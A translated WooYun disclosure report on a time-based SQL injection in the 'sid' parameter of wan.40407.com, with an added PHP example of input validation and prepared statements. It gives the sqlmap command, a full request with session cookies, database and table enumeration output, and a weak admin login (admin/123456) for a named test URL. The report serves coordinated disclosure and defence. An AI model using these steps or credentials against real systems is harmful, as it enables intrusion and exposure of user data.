Game security: SQL injection on the 40407 game site (about 500k user records exposed) plus a weak password on one of its systems

admin  2017-05-01 21:19:02  373 views
Summary

2016-04-28: Details reported to the vendor; awaiting vendor handling
2016-04-28: Vendor confirmed; details disclosed to the vendor only
2016-05-08: Details disclosed to core white hats and domain experts
2016-05-18: Details disclosed to regular white hats
2016-05-28: Details disclosed to intern white hats
2016-06-12: Details disclosed to the public

Vulnerability overview (4 followers)

Defect ID: WooYun-2016-202879

Title: Game security: SQL injection on the 40407 game site (about 500k user records exposed) plus a weak password on one of its systems

Vendor: 40407.com

Author: 黑色键盘丶

Submitted: 2016-04-28 09:09

Published: 2016-06-12 11:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: www.wooyun.org

Tags: php + numeric-type injection; injection techniques



Vulnerability details


Brief description:

As in the title.

Detailed description:

Code area:
POST injection command: sqlmap.py -r 1.txt --dbs  (injected parameter: sid)
==================== POST request ======================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
Host: wan.40407.com
Proxy-Connection: keep-alive
Content-Length: 36
Accept: */*
Origin: http://wan.40407.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D

username=heise123&gid=5&sid=32&isyk=

Database information

Code area:
available databases [25]:
[*] `14x`
[*] `399wantg`
[*] `40407box_test`
[*] `40407box`
[*] `40407boxpt_test`
[*] `40407boxpt`
[*] `40407boxstat`
[*] `40407data`
[*] `40407kfz`
[*] `40407lol`
[*] `40407tqyt`
[*] `dkwdv{`
[*] `kp.ya58.cn`
[*] `s}/x1a!/x03!`
[*] `ucentir)/x11`
[*] `xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*] tuan

Tables in the current database

Code area:
Database: 40407boxpt
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| box_game_tg_data | 761184 |
| box_game_member | 450339 |
| box_gamecard_sn | 280019 |
| box_pay | 22280 |
| box_score_record | 4632 |
| box_score_playinfo | 4016 |
| box_member_mac | 3041 |
| box_content_1 | 2220 |
| box_content_1_extend | 1900 |
| box_score_rule | 1306 |
| box_pk_username | 1074 |
| box_game_server | 650 |
| box_content_1_item | 576 |
| box_jf_pay | 479 |
| box_tag | 236 |
| box_admin_user | 227 |
| box_score_game | 160 |
| box_content_1_sjsg | 139 |
| box_score_pay | 139 |
| box_category | 131 |
| box_content_1_jjsg | 125 |
| box_content_1_sjtl | 90 |
| box_content_1_hero | 67 |
| box_content_1_zwx | 67 |
| box_content_1_nslm | 55 |
| box_model | 35 |
| box_model_field | 35 |
| box_game | 34 |
| box_content_1_rxsg2 | 32 |
| box_content_1_jyjh | 29 |
| box_content_1_ocean | 26 |
| box_content_1_hwsg | 25 |
| box_content_1_mycs | 25 |
| box_user_tg | 24 |
| box_pay_cycle | 23 |
| box_linkage | 18 |
| box_ad | 16 |
| box_content_1_jyjx | 16 |
| box_pk_game | 13 |
| box_pk_number | 13 |
| box_content | 12 |
| box_gid_modelid | 10 |
| box_pingtaibi_fanli | 10 |
| box_pk_rule | 10 |
| box_content_1_bztx | 8 |
| box_plugin | 6 |
| box_content_1_smzt | 5 |
| box_member_group | 5 |
| box_admin_group | 4 |
| box_content_1_jz | 4 |
| box_content_1_rxsg | 4 |
| box_role | 4 |
| box_content_1_mjll | 3 |
| box_wan_top_gg | 3 |
| box_content_1_dsg | 2 |
| box_content_1_game | 2 |
| box_content_1_swydn | 2 |
| box_content_1_xbjz | 2 |
+----------------------+---------+
-------------------------------------
Database: 40407boxpt  (450k user records)
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| box_game_member | 450339 |
+-----------------+---------+
The 200k-plus rows are presumably game card serials/keys, the 700k-plus rows are some other data, and there is payment information as well.

Since this is a time-based blind injection, I did not dump row data as proof here.

======================================================================

Code area:
http://tg.40407.com/admin/mainindex/index  admin / 123456 logs in

Once in, the games' promotion information can be edited.

[screenshot]

Some user information

[screenshot]

Proof of vulnerability: same as the detailed description above.

Fix recommendation:

Filter the input; strengthen the passwords.
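To make the "filter the input" recommendation concrete for a numeric parameter like `sid`, here is an added PHP illustration (not 40407's code; the report shows no source): a hypothetical handler in the vulnerable shape beside a hardened one. The query and the use of the `box_game_server` table are assumptions; only the table name comes from the report's table list.

```php
<?php
// Added illustration, not 40407's code (the report shows no source): a
// hypothetical handler for the `sid` field of index.php?c=pay&a=testgamerole.
// The table name box_game_server is taken from the report's table list; the
// real query is unknown and assumed here.

// Vulnerable shape (numeric-context injection): `sid` is interpolated without
// quotes, so quote escaping such as addslashes() changes nothing, and any text
// after the digits becomes part of the SQL statement.
function buildQueryVulnerable(string $sid): string
{
    $sid = addslashes($sid); // no quotes to escape in a numeric context
    return "SELECT id, name FROM box_game_server WHERE id = $sid";
}

// Hardened step 1: validate the type before the value goes anywhere near SQL.
function parseServerId(string $raw): ?int
{
    // FILTER_VALIDATE_INT accepts only a plain integer; "32 OR 1=1" fails.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened step 2: bind the value so the statement text never changes.
function lookupServer(PDO $db, string $raw): ?array
{
    $id = parseServerId($raw);
    if ($id === null) {
        return null; // reject (and log) rather than silently coerce with (int)
    }
    $stmt = $db->prepare('SELECT id, name FROM box_game_server WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo against an in-memory SQLite table with constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE box_game_server (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO box_game_server VALUES (32, 'constructed-server-32')");

echo buildQueryVulnerable('32 OR 1=1'), "\n"; // the injected text survives intact
var_dump(lookupServer($db, '32'));            // array: id 32, constructed-server-32
var_dump(lookupServer($db, '32 OR 1=1'));     // NULL: rejected before any SQL runs
```

Rejecting non-integer input outright (instead of casting with `(int)`) also gives you a clean signal to log and alert on, which is how a time-based probe against `sid` would surface in monitoring.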

Copyright notice: when reposting, please credit the source: 黑色键盘丶@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-04-28 10:54

Vendor reply:

Thanks. Parameter filtering still needs to be strengthened; the platform had not gone live, it was only under internal testing, and the password had not been changed yet...

Latest status:

None yet




Comments

  1. The test platform has been shut down.
